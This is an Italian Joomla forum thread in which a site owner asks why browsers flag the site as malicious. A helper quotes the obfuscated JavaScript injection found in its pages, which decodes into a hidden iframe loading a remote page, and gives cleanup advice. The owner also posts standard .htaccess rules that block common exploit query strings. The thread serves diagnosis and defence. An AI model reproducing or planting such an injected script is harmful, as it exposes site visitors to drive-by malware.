Back to top

Autore Topic: Mio Sito è segnalato come "sospetto"  (Letto 3157 volte)

Offline orsocapo

  • Esploratore
  • **
  • Post: 122
    • Mostra profilo
Mio Sito è segnalato come "sospetto"
« il: 19 Apr 2012, 23:51:30 »
Salve a tutti,
entrando nel sito su ff e su altri browser appare il messaggio che il sito è sospetto
Il sito web www.consequenze.org è stato segnalato come sito web malevolo ed è stato bloccato sulla base delle impostazioni di sicurezza correnti.
dato che negli ultimi giorni non è stato aggiornato cosa può essere successo?
Grazie

Offline maicolstaip

  • Global Moderator
  • Instancabile
  • ********
  • Post: 17623
  • Sesso: Maschio
    • Mostra profilo
Re:Mio Sito è segnalato come "sospetto"
« Risposta #1 il: 20 Apr 2012, 00:43:41 »
Vuol dire che ti sono entrati,
Che versione di joomla?
Sposto nella sezione sicurezza

Non si risponde a PM tecnici. Postate sul forum. Grazie.

Offline Npaquito

  • Abituale
  • ****
  • Post: 1832
    • Mostra profilo
Re:Mio Sito è segnalato come "sospetto"
« Risposta #2 il: 20 Apr 2012, 08:45:09 »
Hola

Hai questo malware

Codice: [Seleziona]
<script>c=3-1;i=-1-1+c;p=parseInt;if(p("01"+"2"+"3")===83)try{Boolean()["pr"+"otot"+"ype"].q}catch(egewgsd){if(window.document)f=['-32i-32i64i61i-9i-1i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i68i60i69i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i52i0i82i-28i-32i-32i-32i64i61i73i56i68i60i73i-1i0i18i-28i-32i-32i84i-9i60i67i74i60i-9i82i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i78i73i64i75i60i-1i-7i19i64i61i73i56i68i60i-9i74i73i58i20i-2i63i75i75i71i17i6i6i71i64i59i70i63i64i74i5i73i76i6i58i70i76i69i75i8i10i5i71i63i71i-2i-9i78i64i59i75i63i20i-2i8i7i-2i-9i63i60i64i62i63i75i20i-2i8i7i-2i-9i74i75i80i67i60i20i-...
in oltre 5 pagine, cercalo ed eliminalo
« Ultima modifica: 20 Apr 2012, 08:54:20 da Npaquito »
web design, web mobile

Offline orsocapo

  • Esploratore
  • **
  • Post: 122
    • Mostra profilo
Re:Mio Sito è segnalato come "sospetto"
« Risposta #3 il: 20 Apr 2012, 10:03:32 »
grazie mille per la segnalazione del malware.
come posso eliminarlo?


Offline Npaquito

  • Abituale
  • ****
  • Post: 1832
    • Mostra profilo
Re:Mio Sito è segnalato come "sospetto"
« Risposta #4 il: 20 Apr 2012, 10:37:56 »
Hola

In principio devi cercare i files che hanno il codice, aprirli con un editor ed eliminare listruzione, ma e importante che cerchi la "porta di entrata" del malware nel tuo sito e "chiuderla".
web design, web mobile

Offline orsocapo

  • Esploratore
  • **
  • Post: 122
    • Mostra profilo
Re:Mio Sito è segnalato come "sospetto"
« Risposta #5 il: 20 Apr 2012, 10:55:30 »
holas Paquito,
perdonami se ti chiedo un'altra spiegazione.
ho provato a cercare i file tramite ftp ma mi ci sono perso.
c'è un modo per trovarli velocemente?
e la porta del malware come si trova?
scusami a grazie ancora

Offline Npaquito

  • Abituale
  • ****
  • Post: 1832
    • Mostra profilo
Re:Mio Sito è segnalato come "sospetto"
« Risposta #6 il: 20 Apr 2012, 10:59:40 »
Hola

Devi scaricarti tutti i files nel tuo pc e cercare all'interno il codice malevolo.

Chiudere la porta e un disorso lungo che non si puo fare dal di fuori, devi rivedere la sicurezza del tuo server, permessi di files e cartelle, estensioni non sicure, ecc...
web design, web mobile

Offline orsocapo

  • Esploratore
  • **
  • Post: 122
    • Mostra profilo
Re:Mio Sito è segnalato come "sospetto"
« Risposta #7 il: 22 Apr 2012, 18:44:54 »
li scarico (esporto) dal database in formato .sql?
se sì, poi come apro il file?


Offline orsocapo

  • Esploratore
  • **
  • Post: 122
    • Mostra profilo
Re:Mio Sito è segnalato come "sospetto"
« Risposta #8 il: 22 Apr 2012, 19:37:37 »
sul file .htaccess c'è scritto questo (non so se può essere utile:
## Can be commented out if causes errors, see notes above.
#Options +FollowSymLinks

#
# mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)

#RewriteBase /joomla/


########## Begin - Joomla! core SEF Section
#

RewriteRule ^joomla/(.*)$ /$1 [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|.php|.html|.htm|.feed|.pdf|.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section 

 



Web Design Bolzano Kreatif